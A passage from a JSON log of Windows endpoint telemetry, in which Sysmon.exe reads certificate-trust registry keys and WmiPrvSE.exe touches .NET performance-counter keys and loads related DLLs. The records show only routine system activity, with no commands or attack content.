"HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573454330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573454330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573454330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573454330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573454330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573454330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573454330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573454330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573454330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573454330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573454330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573454330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573454330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573455890000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573455890000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 4292, - "process_name": "wmiprvse.exe", - "process_path": "C:\\WINDOWS\\system32\\wbem\\wmiprvse.exe", - "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\.NET CLR Data", - "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\.NET CLR Data\\Linkage", - "registry_value": "Linkage", - "timestamp": 131883573455890000, - "unique_pid": "{42FC7E13-C55B-5C05-0000-001008A91F01}" - }, - { - "event_type": "registry", - "pid": 4292, - "process_name": "wmiprvse.exe", - "process_path": "C:\\WINDOWS\\system32\\wbem\\wmiprvse.exe", - "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\.NET CLR Networking", - "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\.NET CLR Networking\\Linkage", - "registry_value": "Linkage", - "timestamp": 131883573455890000, - "unique_pid": "{42FC7E13-C55B-5C05-0000-001008A91F01}" - }, - { - "event_type": "registry", - "pid": 4292, - "process_name": "wmiprvse.exe", - "process_path": "C:\\WINDOWS\\system32\\wbem\\wmiprvse.exe", - "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\.NET CLR Networking 4.0.0.0", - "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\.NET CLR Networking 4.0.0.0\\Linkage", - "registry_value": "Linkage", - "timestamp": 131883573455890000, - "unique_pid": "{42FC7E13-C55B-5C05-0000-001008A91F01}" - }, - { - "event_type": "image_load", - "image_name": "netfxperf.dll", - "image_path": "C:\\Windows\\System32\\netfxperf.dll", - "pid": 4292, - "process_name": "WmiPrvSE.exe", - "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", - "timestamp": 131883573455890000, - "unique_pid": "{42FC7E13-C55B-5C05-0000-001008A91F01}" - }, - { - "event_type": "registry", - "pid": 4292, - "process_name": "wmiprvse.exe", - "process_path": "C:\\WINDOWS\\system32\\wbem\\wmiprvse.exe", - "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\.NET Memory Cache 4.0", - "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\.NET Memory Cache 4.0\\Linkage", - "registry_value": "Linkage", - "timestamp": 131883573455890000, - "unique_pid": "{42FC7E13-C55B-5C05-0000-001008A91F01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573455890000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573455890000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573455890000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573455890000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573455890000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573455890000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573455890000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 4292, - "process_name": "wmiprvse.exe", - "process_path": "C:\\WINDOWS\\system32\\wbem\\wmiprvse.exe", - "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\MSDTC Bridge 4.0.0.0", - "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\MSDTC Bridge 4.0.0.0\\Linkage", - "registry_value": "Linkage", - "timestamp": 131883573455890000, - "unique_pid": "{42FC7E13-C55B-5C05-0000-001008A91F01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573455890000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573455890000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573455890000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573455890000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573455890000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573455890000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573455890000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573455890000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573455890000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573455890000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573455890000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573455890000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573455890000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573455890000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573455890000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573455890000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573455890000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 4292, - "process_name": "wmiprvse.exe", - "process_path": "C:\\WINDOWS\\system32\\wbem\\wmiprvse.exe", - "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\SMSvcHost 4.0.0.0", - "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\SMSvcHost 4.0.0.0\\Linkage", - "registry_value": "Linkage", - "timestamp": 131883573455890000, - "unique_pid": "{42FC7E13-C55B-5C05-0000-001008A91F01}" - }, - { - "event_type": "registry", - "pid": 4292, - "process_name": "wmiprvse.exe", - "process_path": "C:\\WINDOWS\\system32\\wbem\\wmiprvse.exe", - "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\Windows Workflow Foundation 4.0.0.0", - "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\Windows Workflow Foundation 4.0.0.0\\Linkage", - "registry_value": "Linkage", - "timestamp": 131883573455890000, - "unique_pid": "{42FC7E13-C55B-5C05-0000-001008A91F01}" - }, - { - "event_type": "image_load", - "image_name": "wtsapi32.dll", - "image_path": "C:\\Windows\\System32\\wtsapi32.dll", - "pid": 4292, - "process_name": "WmiPrvSE.exe", - "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", - "timestamp": 131883573456050000, - "unique_pid": "{42FC7E13-C55B-5C05-0000-001008A91F01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573456050000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573456050000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573456050000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573456050000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573456050000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573456050000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573456050000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573456050000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573456050000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573456050000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "CORPerfMonExt.dll", - "image_path": "C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\CORPerfMonExt.dll", - "pid": 4292, - "process_name": "WmiPrvSE.exe", - "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", - "timestamp": 131883573456050000, - "unique_pid": "{42FC7E13-C55B-5C05-0000-001008A91F01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573456050000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573456050000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573456050000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573456050000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573456050000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": 